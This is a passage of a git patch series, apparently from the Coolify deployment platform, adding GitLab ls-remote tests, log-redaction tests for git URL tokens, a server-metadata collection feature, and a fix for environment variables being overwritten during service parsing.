+            'environment_id' => 1,
+            'destination_id' => 0,
+            'destination_type' => StandaloneDocker::class,
+            'source_id' => 1,
+            'source_type' => GitlabApp::class,
+        ]);
     }
 }
diff --git a/database/seeders/ApplicationSettingsSeeder.php b/database/seeders/ApplicationSettingsSeeder.php
index 8e439fd16..87236df8a 100644
--- a/database/seeders/ApplicationSettingsSeeder.php
+++ b/database/seeders/ApplicationSettingsSeeder.php
@@ -15,5 +15,12 @@ public function run(): void
         $application_1 = Application::find(1)->load(['settings']);
         $application_1->settings->is_debug_enabled = false;
         $application_1->settings->save();
+
+        $gitlabPublic = Application::where('uuid', 'gitlab-public-example')->first();
+        if ($gitlabPublic) {
+            $gitlabPublic->load(['settings']);
+            $gitlabPublic->settings->is_static = true;
+            $gitlabPublic->settings->save();
+        }
     }
 }
diff --git a/tests/Unit/GitlabSourceCommandsTest.php b/tests/Unit/GitlabSourceCommandsTest.php
new file mode 100644
index 000000000..077b21590
--- /dev/null
+++ b/tests/Unit/GitlabSourceCommandsTest.php
@@ -0,0 +1,91 @@
+<?php
+
+use App\Models\Application;
+use App\Models\GitlabApp;
+use App\Models\PrivateKey;
+
+afterEach(function () {
+    Mockery::close();
+});
+
+it('generates ls-remote commands for GitLab source with private key', function () {
+    $deploymentUuid = 'test-deployment-uuid';
+
+    $privateKey = Mockery::mock(PrivateKey::class)->makePartial();
+    $privateKey->shouldReceive('getAttribute')->with('private_key')->andReturn('fake-private-key');
+
+    $gitlabSource = Mockery::mock(GitlabApp::class)->makePartial();
+    $gitlabSource->shouldReceive('getMorphClass')->andReturn(\App\Models\GitlabApp::class);
+    $gitlabSource->shouldReceive('getAttribute')->with('privateKey')->andReturn($privateKey);
+    $gitlabSource->shouldReceive('getAttribute')->with('private_key_id')->andReturn(1);
+    $gitlabSource->shouldReceive('getAttribute')->with('custom_port')->andReturn(22);
+
+    $application = Mockery::mock(Application::class)->makePartial();
+    $application->git_branch = 'main';
+    $application->shouldReceive('deploymentType')->andReturn('source');
+    $application->shouldReceive('customRepository')->andReturn([
+        'repository' => 'git@gitlab.com:user/repo.git',
+        'port' => 22,
+    ]);
+    $application->shouldReceive('getAttribute')->with('source')->andReturn($gitlabSource);
+    $application->source = $gitlabSource;
+
+    $result = $application->generateGitLsRemoteCommands($deploymentUuid, false);
+
+    expect($result)->toBeArray();
+    expect($result)->toHaveKey('commands');
+    expect($result['commands'])->toContain('git ls-remote');
+    expect($result['commands'])->toContain('id_rsa');
+    expect($result['commands'])->toContain('mkdir -p /root/.ssh');
+});
+
+it('generates ls-remote commands for GitLab source without private key', function () {
+    $deploymentUuid = 'test-deployment-uuid';
+
+    $gitlabSource = Mockery::mock(GitlabApp::class)->makePartial();
+    $gitlabSource->shouldReceive('getMorphClass')->andReturn(\App\Models\GitlabApp::class);
+    $gitlabSource->shouldReceive('getAttribute')->with('privateKey')->andReturn(null);
+    $gitlabSource->shouldReceive('getAttribute')->with('private_key_id')->andReturn(null);
+
+    $application = Mockery::mock(Application::class)->makePartial();
+    $application->git_branch = 'main';
+    $application->shouldReceive('deploymentType')->andReturn('source');
+    $application->shouldReceive('customRepository')->andReturn([
+        'repository' => 'https://gitlab.com/user/repo.git',
+        'port' => 22,
+    ]);
+    $application->shouldReceive('getAttribute')->with('source')->andReturn($gitlabSource);
+    $application->source = $gitlabSource;
+
+    $result = $application->generateGitLsRemoteCommands($deploymentUuid, false);
+
+    expect($result)->toBeArray();
+    expect($result)->toHaveKey('commands');
+    expect($result['commands'])->toContain('git ls-remote');
+    expect($result['commands'])->toContain('https://gitlab.com/user/repo.git');
+    // Should NOT contain SSH key setup
+    expect($result['commands'])->not->toContain('id_rsa');
+});
+
+it('does not return null for GitLab source type', function () {
+    $deploymentUuid = 'test-deployment-uuid';
+
+    $gitlabSource = Mockery::mock(GitlabApp::class)->makePartial();
+    $gitlabSource->shouldReceive('getMorphClass')->andReturn(\App\Models\GitlabApp::class);
+    $gitlabSource->shouldReceive('getAttribute')->with('privateKey')->andReturn(null);
+    $gitlabSource->shouldReceive('getAttribute')->with('private_key_id')->andReturn(null);
+
+    $application = Mockery::mock(Application::class)->makePartial();
+    $application->git_branch = 'main';
+    $application->shouldReceive('deploymentType')->andReturn('source');
+    $application->shouldReceive('customRepository')->andReturn([
+        'repository' => 'https://gitlab.com/user/repo.git',
+        'port' => 22,
+    ]);
+    $application->shouldReceive('getAttribute')->with('source')->andReturn($gitlabSource);
+    $application->source = $gitlabSource;
+
+    $lsRemoteResult = $application->generateGitLsRemoteCommands($deploymentUuid, false);
+    expect($lsRemoteResult)->not->toBeNull();
+    expect($lsRemoteResult)->toHaveKeys(['commands', 'branch', 'fullRepoUrl']);
+});
diff --git a/tests/Unit/SanitizeLogsForExportTest.php b/tests/Unit/SanitizeLogsForExportTest.php
index 39d16c993..285230ea4 100644
--- a/tests/Unit/SanitizeLogsForExportTest.php
+++ b/tests/Unit/SanitizeLogsForExportTest.php
@@ -153,6 +153,22 @@
     expect($result)->toContain('aws_secret_access_key='.REDACTED);
 });
 
+it('removes HTTPS basic auth passwords from git URLs', function () {
+    $testCases = [
+        'https://oauth2:glpat-xxxxxxxxxxxx@gitlab.com/user/repo.git' => 'https://oauth2:'.REDACTED.'@'.REDACTED,
+        'https://user:my-secret-token@gitlab.example.com/group/repo.git' => 'https://user:'.REDACTED.'@'.REDACTED,
+        'http://deploy:token123@git.internal.com/repo.git' => 'http://deploy:'.REDACTED.'@'.REDACTED,
+    ];
+
+    foreach ($testCases as $input => $notExpected) {
+        $result = sanitizeLogsForExport($input);
+        // The password should be redacted
+        expect($result)->not->toContain('glpat-xxxxxxxxxxxx');
+        expect($result)->not->toContain('my-secret-token');
+        expect($result)->not->toContain('token123');
+    }
+});
+
 it('removes generic URL passwords', function () {
     $testCases = [
         'ftp://user:ftppass@ftp.example.com/path' => 'ftp://user:'.REDACTED.'@ftp.example.com/path',

From e52a49b5e9d70ade80b0f98529bf47b3793197de Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 11 Mar 2026 16:21:05 +0100
Subject: [PATCH 041/213] feat(server): add server metadata collection and
 display

Add ability to gather and display server system information including OS, architecture, kernel version, CPU count, memory, and uptime. Includes:
- New gatherServerMetadata() method to collect system details via remote commands
- New refreshServerMetadata() Livewire action with authorization and error handling
- Server Details UI section showing collected metadata with refresh capability
- Database migration to add server_metadata JSON column
- Comprehensive test suite for metadata collection and persistence
---
 app/Livewire/Server/Show.php                  | 16 ++++
 app/Models/Server.php                         | 52 ++++++++++
 ...0_add_server_metadata_to_servers_table.php | 32 +++++++
 .../views/livewire/server/show.blade.php      | 52 ++++++++++
 tests/Feature/ServerMetadataTest.php          | 96 +++++++++++++++++++
 5 files changed, 248 insertions(+)
 create mode 100644 database/migrations/2026_03_11_000000_add_server_metadata_to_servers_table.php
 create mode 100644 tests/Feature/ServerMetadataTest.php

diff --git a/app/Livewire/Server/Show.php b/app/Livewire/Server/Show.php
index edc17004c..84cb65ee6 100644
--- a/app/Livewire/Server/Show.php
+++ b/app/Livewire/Server/Show.php
@@ -483,6 +483,22 @@ public function startHetznerServer()
         }
     }
 
+    public function refreshServerMetadata(): void
+    {
+        try {
+            $this->authorize('update', $this->server);
+            $result = $this->server->gatherServerMetadata();
+            if ($result) {
+                $this->server->refresh();
+                $this->dispatch('success', 'Server details refreshed.');
+            } else {
+                $this->dispatch('error', 'Could not fetch server details. Is the server reachable?');
+            }
+        } catch (\Throwable $e) {
+            handleError($e, $this);
+        }
+    }
+
     public function submit()
     {
         try {
diff --git a/app/Models/Server.php b/app/Models/Server.php
index 5099a9fec..508b9833b 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -25,6 +25,7 @@
 use Illuminate\Support\Carbon;
 use Illuminate\Support\Collection;
 use Illuminate\Support\Facades\DB;
+use Illuminate\Support\Facades\Log;
 use Illuminate\Support\Facades\Storage;
 use Illuminate\Support\Stringable;
 use OpenApi\Attributes as OA;
@@ -231,6 +232,7 @@ public static function flushIdentityMap(): void
     protected $casts = [
         'proxy' => SchemalessAttributes::class,
         'traefik_outdated_info' => 'array',
+        'server_metadata' => 'array',
         'logdrain_axiom_api_key' => 'encrypted',
         'logdrain_newrelic_license_key' => 'encrypted',
         'delete_unused_volumes' => 'boolean',
@@ -258,6 +260,7 @@ public static function flushIdentityMap(): void
         'is_validating',
         'detected_traefik_version',
         'traefik_outdated_info',
+        'server_metadata',
     ];
 
     protected $guarded = [];
@@ -1074,6 +1077,55 @@ public function validateOS(): bool|Stringable
         }
     }
 
+    public function gatherServerMetadata(): ?array
+    {
+        if (! $this->isFunctional()) {
+            return null;
+        }
+
+        try {
+            $output = instant_remote_process([
+                'echo "---PRETTY_NAME---" && grep PRETTY_NAME /etc/os-release | cut -d= -f2 | tr -d \'"\' && echo "---ARCH---" && uname -m && echo "---KERNEL---" && uname -r && echo "---CPUS---" && nproc && echo "---MEMORY---" && free -b | awk \'/Mem:/{print $2}\' && echo "---UPTIME_SINCE---" && uptime -s',
+            ], $this, false);
+
+            if (! $output) {
+                return null;
+            }
+
+            $sections = [];
+            $currentKey = null;
+            foreach (explode("\n", trim($output)) as $line) {
+                $line = trim($line);
+                if (preg_match('/^---(\w+)---$/', $line, $m)) {
+                    $currentKey = $m[1];
+                } elseif ($currentKey) {
+                    $sections[$currentKey] = $line;
+                }
+            }
+
+            $metadata = [
+                'os' => $sections['PRETTY_NAME'] ?? 'Unknown',
+                'arch' => $sections['ARCH'] ?? 'Unknown',
+                'kernel' => $sections['KERNEL'] ?? 'Unknown',
+                'cpus' => (int) ($sections['CPUS'] ?? 0),
+                'memory_bytes' => (int) ($sections['MEMORY'] ?? 0),
+                'uptime_since' => $sections['UPTIME_SINCE'] ?? null,
+                'collected_at' => now()->toIso8601String(),
+            ];
+
+            $this->update(['server_metadata' => $metadata]);
+
+            return $metadata;
+        } catch (\Throwable $e) {
+            Log::debug('Failed to gather server metadata', [
+                'server_id' => $this->id,
+                'error' => $e->getMessage(),
+            ]);
+
+            return null;
+        }
+    }
+
     public function isTerminalEnabled()
     {
         return $this->settings->is_terminal_enabled ?? false;
diff --git a/database/migrations/2026_03_11_000000_add_server_metadata_to_servers_table.php b/database/migrations/2026_03_11_000000_add_server_metadata_to_servers_table.php
new file mode 100644
index 000000000..cea25c3ba
--- /dev/null
+++ b/database/migrations/2026_03_11_000000_add_server_metadata_to_servers_table.php
@@ -0,0 +1,32 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Database\Schema\Blueprint;
+use Illuminate\Support\Facades\Schema;
+
+return new class extends Migration
+{
+    /**
+     * Run the migrations.
+     */
+    public function up(): void
+    {
+        if (! Schema::hasColumn('servers', 'server_metadata')) {
+            Schema::table('servers', function (Blueprint $table) {
+                $table->json('server_metadata')->nullable();
+            });
+        }
+    }
+
+    /**
+     * Reverse the migrations.
+     */
+    public function down(): void
+    {
+        if (Schema::hasColumn('servers', 'server_metadata')) {
+            Schema::table('servers', function (Blueprint $table) {
+                $table->dropColumn('server_metadata');
+            });
+        }
+    }
+};
diff --git a/resources/views/livewire/server/show.blade.php b/resources/views/livewire/server/show.blade.php
index f58dc058b..7017d7104 100644
--- a/resources/views/livewire/server/show.blade.php
+++ b/resources/views/livewire/server/show.blade.php
@@ -289,6 +289,58 @@ class="w-full input opacity-50 cursor-not-allowed"
                     </div>
                 </div>
             </form>
+            @if ($server->isFunctional())
+                <div class="pt-6">
+                    <div class="flex items-center gap-2 mb-3">
+                        <h3>Server Details</h3>
+                        @if ($server->server_metadata)
+                            <button wire:click="refreshServerMetadata" wire:loading.attr="disabled"
+                                wire:target="refreshServerMetadata" title="Refresh server details"
+                                class="dark:hover:fill-white fill-black dark:fill-warning">
+                                <svg wire:loading.remove wire:target="refreshServerMetadata" class="w-4 h-4"
+                                    viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
+                                    <path
+                                        d="M12 2a10.016 10.016 0 0 0-7 2.877V3a1 1 0 1 0-2 0v4.5a1 1 0 0 0 1 1h4.5a1 1 0 0 0 0-2H6.218A7.98 7.98 0 0 1 20 12a1 1 0 0 0 2 0A10.012 10.012 0 0 0 12 2zm7.989 13.5h-4.5a1 1 0 0 0 0 2h2.293A7.98 7.98 0 0 1 4 12a1 1 0 0 0-2 0a9.986 9.986 0 0 0 16.989 7.133V21a1 1 0 0 0 2 0v-4.5a1 1 0 0 0-1-1z" />
+                                </svg>
+                                <svg wire:loading wire:target="refreshServerMetadata" class="w-4 h-4 animate-spin"
+                                    viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
+                                    <path
+                                        d="M12 2a10.016 10.016 0 0 0-7 2.877V3a1 1 0 1 0-2 0v4.5a1 1 0 0 0 1 1h4.5a1 1 0 0 0 0-2H6.218A7.98 7.98 0 0 1 20 12a1 1 0 0 0 2 0A10.012 10.012 0 0 0 12 2zm7.989 13.5h-4.5a1 1 0 0 0 0 2h2.293A7.98 7.98 0 0 1 4 12a1 1 0 0 0-2 0a9.986 9.986 0 0 0 16.989 7.133V21a1 1 0 0 0 2 0v-4.5a1 1 0 0 0-1-1z" />
+                                </svg>
+                            </button>
+                        @endif
+                    </div>
+                    @if ($server->server_metadata)
+                        @php $meta = $server->server_metadata; @endphp
+                        <div class="grid grid-cols-2 gap-x-6 gap-y-2 text-sm lg:grid-cols-3">
+                            <div><span class="font-medium dark:text-neutral-400">OS:</span>
+                                {{ $meta['os'] ?? 'N/A' }}</div>
+                            <div><span class="font-medium dark:text-neutral-400">Arch:</span>
+                                {{ $meta['arch'] ?? 'N/A' }}</div>
+                            <div><span class="font-medium dark:text-neutral-400">Kernel:</span>
+                                {{ $meta['kernel'] ?? 'N/A' }}</div>
+                            <div><span class="font-medium dark:text-neutral-400">CPU Cores:</span>
+                                {{ $meta['cpus'] ?? 'N/A' }}</div>
+                            <div><span class="font-medium dark:text-neutral-400">RAM:</span>
+                                {{ isset($meta['memory_bytes']) ? round($meta['memory_bytes'] / 1073741824, 1) . ' GB' : 'N/A' }}
+                            </div>
+                            <div><span class="font-medium dark:text-neutral-400">Up Since:</span>
+                                {{ $meta['uptime_since'] ?? 'N/A' }}</div>
+                        </div>
+                        @if (isset($meta['collected_at']))
+                            <p class="mt-2 text-xs dark:text-neutral-500">Last updated:
+                                {{ \Carbon\Carbon::parse($meta['collected_at'])->diffForHumans() }}</p>
+                        @endif
+                    @else
+                        <x-forms.button wire:click="refreshServerMetadata" canGate="update"
+                            :canResource="$server">
+                            <span wire:loading.remove wire:target="refreshServerMetadata">Fetch Server
+                                Details</span>
+                            <span wire:loading wire:target="refreshServerMetadata">Fetching...</span>
+                        </x-forms.button>
+                    @endif
+                </div>
+            @endif
             @if (!$server->hetzner_server_id && $availableHetznerTokens->isNotEmpty())
                 <div class="pt-6">
                     <h3>Link to Hetzner Cloud</h3>
diff --git a/tests/Feature/ServerMetadataTest.php b/tests/Feature/ServerMetadataTest.php
new file mode 100644
index 000000000..fcd515de9
--- /dev/null
+++ b/tests/Feature/ServerMetadataTest.php
@@ -0,0 +1,96 @@
+<?php
+
+use App\Models\Server;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $user = User::factory()->create();
+    $this->team = Team::factory()->create();
+    $user->teams()->attach($this->team);
+    $this->actingAs($user);
+    session(['currentTeam' => $this->team]);
+
+    $this->server = Server::factory()->create([
+        'team_id' => $this->team->id,
+    ]);
+});
+
+it('casts server_metadata as array', function () {
+    $metadata = [
+        'os' => 'Ubuntu 22.04.3 LTS',
+        'arch' => 'x86_64',
+        'kernel' => '5.15.0-91-generic',
+        'cpus' => 4,
+        'memory_bytes' => 8589934592,
+        'uptime_since' => '2024-01-15 10:30:00',
+        'collected_at' => now()->toIso8601String(),
+    ];
+
+    $this->server->update(['server_metadata' => $metadata]);
+    $this->server->refresh();
+
+    expect($this->server->server_metadata)->toBeArray()
+        ->and($this->server->server_metadata['os'])->toBe('Ubuntu 22.04.3 LTS')
+        ->and($this->server->server_metadata['cpus'])->toBe(4)
+        ->and($this->server->server_metadata['memory_bytes'])->toBe(8589934592);
+});
+
+it('stores null server_metadata by default', function () {
+    expect($this->server->server_metadata)->toBeNull();
+});
+
+it('includes server_metadata in fillable', function () {
+    $this->server->fill(['server_metadata' => ['os' => 'Test']]);
+
+    expect($this->server->server_metadata)->toBe(['os' => 'Test']);
+});
+
+it('persists and retrieves full server metadata structure', function () {
+    $metadata = [
+        'os' => 'Debian GNU/Linux 12 (bookworm)',
+        'arch' => 'aarch64',
+        'kernel' => '6.1.0-17-arm64',
+        'cpus' => 8,
+        'memory_bytes' => 17179869184,
+        'uptime_since' => '2024-03-01 08:00:00',
+        'collected_at' => '2024-03-10T12:00:00+00:00',
+    ];
+
+    $this->server->update(['server_metadata' => $metadata]);
+    $this->server->refresh();
+
+    expect($this->server->server_metadata)
+        ->toHaveKeys(['os', 'arch', 'kernel', 'cpus', 'memory_bytes', 'uptime_since', 'collected_at'])
+        ->and($this->server->server_metadata['os'])->toBe('Debian GNU/Linux 12 (bookworm)')
+        ->and($this->server->server_metadata['arch'])->toBe('aarch64')
+        ->and($this->server->server_metadata['cpus'])->toBe(8)
+        ->and(round($this->server->server_metadata['memory_bytes'] / 1073741824, 1))->toBe(16.0);
+});
+
+it('returns null from gatherServerMetadata when server is not functional', function () {
+    $this->server->settings->update([
+        'is_reachable' => false,
+        'is_usable' => false,
+    ]);
+
+    $this->server->refresh();
+
+    expect($this->server->gatherServerMetadata())->toBeNull();
+});
+
+it('can overwrite server_metadata with new values', function () {
+    $this->server->update(['server_metadata' => ['os' => 'Ubuntu 20.04', 'cpus' => 2]]);
+    $this->server->refresh();
+
+    expect($this->server->server_metadata['os'])->toBe('Ubuntu 20.04');
+
+    $this->server->update(['server_metadata' => ['os' => 'Ubuntu 22.04', 'cpus' => 4]]);
+    $this->server->refresh();
+
+    expect($this->server->server_metadata['os'])->toBe('Ubuntu 22.04')
+        ->and($this->server->server_metadata['cpus'])->toBe(4);
+});

From 58d510042b24319f6608e0fdbcf81d021cc87cbc Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 11 Mar 2026 16:34:33 +0100
Subject: [PATCH 042/213] fix(parsers): use firstOrCreate instead of
 updateOrCreate for environment variables

Replace updateOrCreate with firstOrCreate when creating FQDN and URL
environment variables in serviceParser. This prevents overwriting values
that have already been set by direct template declarations or updateCompose,
ensuring user-defined environment variables are preserved.
---
 bootstrap/helpers/parsers.php | 14 ++++++++------
 1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/bootstrap/helpers/parsers.php b/bootstrap/helpers/parsers.php
index 85ae5ad3e..cb9811e46 100644
--- a/bootstrap/helpers/parsers.php
+++ b/bootstrap/helpers/parsers.php
@@ -1875,8 +1875,9 @@ function serviceParser(Service $resource): Collection
                         $serviceExists->fqdn = $url;
                         $serviceExists->save();
                     }
-                    // Create FQDN variable
-                    $resource->environment_variables()->updateOrCreate([
+                    // Create FQDN variable (use firstOrCreate to avoid overwriting values
+                    // already set by direct template declarations or updateCompose)
+                    $resource->environment_variables()->firstOrCreate([
                         'key' => $key->value(),
                         'resourceable_type' => get_class($resource),
                         'resourceable_id' => $resource->id,
@@ -1888,7 +1889,7 @@ function serviceParser(Service $resource): Collection
 
                     // Also create the paired SERVICE_URL_* variable
                     $urlKey = 'SERVICE_URL_'.strtoupper($fqdnFor);
-                    $resource->environment_variables()->updateOrCreate([
+                    $resource->environment_variables()->firstOrCreate([
                         'key' => $urlKey,
                         'resourceable_type' => get_class($resource),
                         'resourceable_id' => $resource->id,
@@ -1918,8 +1919,9 @@ function serviceParser(Service $resource): Collection
                         $serviceExists->fqdn = $url;
                         $serviceExists->save();
                     }
-                    // Create URL variable
-                    $resource->environment_variables()->updateOrCreate([
+                    // Create URL variable (use firstOrCreate to avoid overwriting values
+                    // already set by direct template declarations or updateCompose)
+                    $resource->environment_variables()->firstOrCreate([
                         'key' => $key->value(),
                         'resourceable_type' => get_class($resource),
                         'resourceable_id' => $resource->id,
@@ -1931,7 +1933,7 @@ function serviceParser(Service $resource): Collection
 
                     // Also create the paired SERVICE_FQDN_* variable
                     $fqdnKey = 'SERVICE_FQDN_'.strtoupper($urlFor);
-                    $resource->environment_variables()->updateOrCreate([
+                    $resource->environment_variables()->firstOrCreate([
                         'key' => $fqdnKey,
                         'resourceable_type' => get_class($resource),
                         'resourceable_id' => $resource->id,

From 54c5ad38da8e15f5637eeac244546a4d6d656cdf Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 11 Mar 2026 17:15:17 +0100
Subject: [PATCH 043/213] test(magic-variables): add feature tests for
 SERVICE_URL/FQDN variable handling

Add comprehensive test suite verifying that magic (referenced) SERVICE_URL_ and
SERVICE_FQDN_ variables don't overwrite values set by direct template declarations
or updateCompose(). Tests cover the fix for GitHub issue #8912 where generic
SERVICE_URL and SERVICE_FQDN variables remained stale after changing a service
domain in the UI. These tests ensure the transition from updateOrCreate() to
firstOrCreate() in the magic variables section works correctly.
---
 .../ServiceMagicVariableOverwriteTest.php     | 171 ++++++++++++++++++
 1 file changed, 171 insertions(+)
 create mode 100644 tests/Feature/ServiceMagicVariableOverwriteTest.php

diff --git a/tests/Feature/ServiceMagicVariableOverwriteTest.php b/tests/Feature/ServiceMagicVariableOverwriteTest.php
new file mode 100644
index 000000000..c592b047e
--- /dev/null
+++ b/tests/Feature/ServiceMagicVariableOverwriteTest.php
@@ -0,0 +1,171 @@
+<?php
+
+/**
+ * Feature tests to verify that magic (referenced) SERVICE_URL_/SERVICE_FQDN_
+ * variables do not overwrite values set by direct template declarations or updateCompose().
+ *
+ * This tests the fix for GitHub issue #8912 where generic SERVICE_URL and SERVICE_FQDN
+ * variables remained stale after changing a service domain in the UI, while
+ * port-specific variants updated correctly.
+ *
+ * Root cause: The magic variables section in serviceParser() used updateOrCreate()
+ * which overwrote values from direct template declarations with auto-generated FQDNs.
+ * Fix: Changed to firstOrCreate() so magic references don't overwrite existing values.
+ *
+ * IMPORTANT: These tests require database access and must be run inside Docker:
+ * docker exec coolify php artisan test --filter ServiceMagicVariableOverwriteTest
+ */
+
+use App\Models\Server;
+use App\Models\Service;
+use App\Models\ServiceApplication;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+test('generic SERVICE_URL/FQDN vars update after domain change when referenced by other services', function () {
+    $server = Server::factory()->create([
+        'name' => 'test-server',
+        'ip' => '127.0.0.1',
+    ]);
+
+    // Compose template where:
+    // - nginx directly declares SERVICE_FQDN_NGINX_8080 (Section 1)
+    // - backend references ${SERVICE_URL_NGINX} and ${SERVICE_FQDN_NGINX} (Section 2 - magic)
+    $template = <<<'YAML'
+services:
+  nginx:
+    image: nginx:latest
+    environment:
+      - SERVICE_FQDN_NGINX_8080
+    ports:
+      - "8080:80"
+  backend:
+    image: node:20-alpine
+    environment:
+      - PUBLIC_URL=${SERVICE_URL_NGINX}
+      - PUBLIC_FQDN=${SERVICE_FQDN_NGINX}
+YAML;
+
+    $service = Service::factory()->create([
+        'server_id' => $server->id,
+        'name' => 'test-service',
+        'docker_compose_raw' => $template,
+    ]);
+
+    $serviceApp = ServiceApplication::factory()->create([
+        'service_id' => $service->id,
+        'name' => 'nginx',
+        'fqdn' => null,
+    ]);
+
+    // Initial parse - generates auto FQDNs
+    $service->parse();
+
+    $baseUrl = $service->environment_variables()->where('key', 'SERVICE_URL_NGINX')->first();
+    $baseFqdn = $service->environment_variables()->where('key', 'SERVICE_FQDN_NGINX')->first();
+    $portUrl = $service->environment_variables()->where('key', 'SERVICE_URL_NGINX_8080')->first();
+    $portFqdn = $service->environment_variables()->where('key', 'SERVICE_FQDN_NGINX_8080')->first();
+
+    // All four variables should exist after initial parse
+    expect($baseUrl)->not->toBeNull('SERVICE_URL_NGINX should exist');
+    expect($baseFqdn)->not->toBeNull('SERVICE_FQDN_NGINX should exist');
+    expect($portUrl)->not->toBeNull('SERVICE_URL_NGINX_8080 should exist');
+    expect($portFqdn)->not->toBeNull('SERVICE_FQDN_NGINX_8080 should exist');
+
+    // Now simulate user changing domain via UI (EditDomain::submit flow)
+    $serviceApp->fqdn = 'https://my-nginx.example.com:8080';
+    $serviceApp->save();
+
+    // updateCompose() runs first (sets correct values)
+    updateCompose($serviceApp);
+
+    // Then parse() runs (should NOT overwrite the correct values)
+    $service->parse();
+
+    // Reload all variables
+    $baseUrl = $service->environment_variables()->where('key', 'SERVICE_URL_NGINX')->first();
+    $baseFqdn = $service->environment_variables()->where('key', 'SERVICE_FQDN_NGINX')->first();
+    $portUrl = $service->environment_variables()->where('key', 'SERVICE_URL_NGINX_8080')->first();
+    $portFqdn = $service->environment_variables()->where('key', 'SERVICE_FQDN_NGINX_8080')->first();
+
+    // ALL variables should reflect the custom domain
+    expect($baseUrl->value)->toBe('https://my-nginx.example.com')
+        ->and($baseFqdn->value)->toBe('my-nginx.example.com')
+        ->and($portUrl->value)->toBe('https://my-nginx.example.com:8080')
+        ->and($portFqdn->value)->toBe('my-nginx.example.com:8080');
+})->skip('Requires database - run in Docker');
+
+test('magic variable references do not overwrite direct template declarations on initial parse', function () {
+    $server = Server::factory()->create([
+        'name' => 'test-server',
+        'ip' => '127.0.0.1',
+    ]);
+
+    // Backend references the port-specific variable via magic syntax
+    $template = <<<'YAML'
+services:
+  app:
+    image: nginx:latest
+    environment:
+      - SERVICE_FQDN_APP_3000
+    ports:
+      - "3000:3000"
+  worker:
+    image: node:20-alpine
+    environment:
+      - API_URL=${SERVICE_URL_APP_3000}
+YAML;
+
+    $service = Service::factory()->create([
+        'server_id' => $server->id,
+        'name' => 'test-service',
+        'docker_compose_raw' => $template,
+    ]);
+
+    ServiceApplication::factory()->create([
+        'service_id' => $service->id,
+        'name' => 'app',
+        'fqdn' => null,
+    ]);
+
+    // Parse the service
+    $service->parse();
+
+    $portUrl = $service->environment_variables()->where('key', 'SERVICE_URL_APP_3000')->first();
+    $portFqdn = $service->environment_variables()->where('key', 'SERVICE_FQDN_APP_3000')->first();
+
+    // Port-specific vars should have port as a URL port suffix (:3000),
+    // NOT baked into the subdomain (app-3000-uuid.sslip.io)
+    expect($portUrl)->not->toBeNull();
+    expect($portFqdn)->not->toBeNull();
+    expect($portUrl->value)->toContain(':3000');
+    // The domain should NOT have 3000 in the subdomain
+    $urlWithoutPort = str($portUrl->value)->before(':3000')->value();
+    expect($urlWithoutPort)->not->toContain('3000');
+})->skip('Requires database - run in Docker');
+
+test('parsers.php uses firstOrCreate for magic variable references', function () {
+    $parsersFile = file_get_contents(base_path('bootstrap/helpers/parsers.php'));
+
+    // Find the magic variables section (Section 2) which processes ${SERVICE_*} references
+    // It should use firstOrCreate, not updateOrCreate, to avoid overwriting values
+    // set by direct template declarations (Section 1) or updateCompose()
+
+    // Look for the specific pattern: the magic variables section creates FQDN and URL pairs
+    // after the "Also create the paired SERVICE_URL_*" and "Also create the paired SERVICE_FQDN_*" comments
+
+    // Extract the magic variables section (between "$magicEnvironments->count()" and the end of the foreach)
+    $magicSectionStart = strpos($parsersFile, '$magicEnvironments->count() > 0');
+    expect($magicSectionStart)->not->toBeFalse('Magic variables section should exist');
+
+    $magicSection = substr($parsersFile, $magicSectionStart, 5000);
+
+    // Count updateOrCreate vs firstOrCreate in the magic section
+    $updateOrCreateCount = substr_count($magicSection, 'updateOrCreate');
+    $firstOrCreateCount = substr_count($magicSection, 'firstOrCreate');
+
+    // Magic section should use firstOrCreate for SERVICE_URL/FQDN variables
+    expect($firstOrCreateCount)->toBeGreaterThanOrEqual(4, 'Magic variables section should use firstOrCreate for SERVICE_URL/FQDN pairs')
+        ->and($updateOrCreateCount)->toBe(0, 'Magic variables section should not use updateOrCreate for SERVICE_URL/FQDN variables');
+});

From ebfa53d9cad2a5d05b0ea4893563467b3f39870e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 13:01:18 +0100
Subject: [PATCH 044/213] refactor(ssh): remove Sentry retry event tracking
 from ExecuteRemoteCommand

Remove the trackSshRetryEvent() call from SSH retry handling. This tracking is no longer
needed in the retry logic.
---
 app/Traits/ExecuteRemoteCommand.php | 7 -------
 1 file changed, 7 deletions(-)

diff --git a/app/Traits/ExecuteRemoteCommand.php b/app/Traits/ExecuteRemoteCommand.php
index a60a47b93..a4ea6abe5 100644
--- a/app/Traits/ExecuteRemoteCommand.php
+++ b/app/Traits/ExecuteRemoteCommand.php
@@ -111,13 +111,6 @@ public function execute_remote_command(...$commands)
                         $attempt++;
                         $delay = $this->calculateRetryDelay($attempt - 1);
 
-                        // Track SSH retry event in Sentry
-                        $this->trackSshRetryEvent($attempt, $maxRetries, $delay, $errorMessage, [
-                            'server' => $this->server->name ?? $this->server->ip ?? 'unknown',
-                            'command' => $this->redact_sensitive_info($command),
-                            'trait' => 'ExecuteRemoteCommand',
-                        ]);
-
                         // Add log entry for the retry
                         if (isset($this->application_deployment_queue)) {
                             $this->addRetryLogEntry($attempt, $maxRetries, $delay, $errorMessage);

From 01031fc5f3d25422eec2f0376ea98475a7337212 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 13:09:13 +0100
Subject: [PATCH 045/213] refactor: consolidate file path validation patterns
 and support scoped packages

- Extract file path validation regex into ValidationPatterns::FILE_PATH_PATTERN constant
- Add filePathRules() and filePathMessages() helper methods for reusable validation
